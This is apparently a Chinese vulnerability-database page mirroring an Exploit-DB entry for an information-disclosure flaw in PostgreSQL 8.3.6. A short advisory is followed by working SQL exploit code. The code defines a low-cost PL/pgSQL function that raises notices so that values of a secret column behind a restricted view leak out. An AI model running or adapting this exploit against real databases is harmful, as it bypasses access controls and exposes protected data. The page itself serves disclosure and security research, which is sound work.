PostgreSQL 8.3.6 - Low Cost Function Information Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057551 漏洞类型
发布时间 2009-03-10 更新时间 2009-03-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32847
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/34069/info

PostgreSQL is prone to an information-disclosure vulnerability.

Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

PostgreSQL 8.3.6 is vulnerable; other versions may also be affected. 

CREATE OR REPLACE FUNCTION do_tell(anyelement)
RETURNS bool
COST 0.1
VOLATILE
LANGUAGE plpgsql
AS $body$
BEGIN
raise notice 'hah: %s', $1::text;
return true;
END;
$body$;

SELECT * FROM restricted_view WHERE do_tell(secret_column);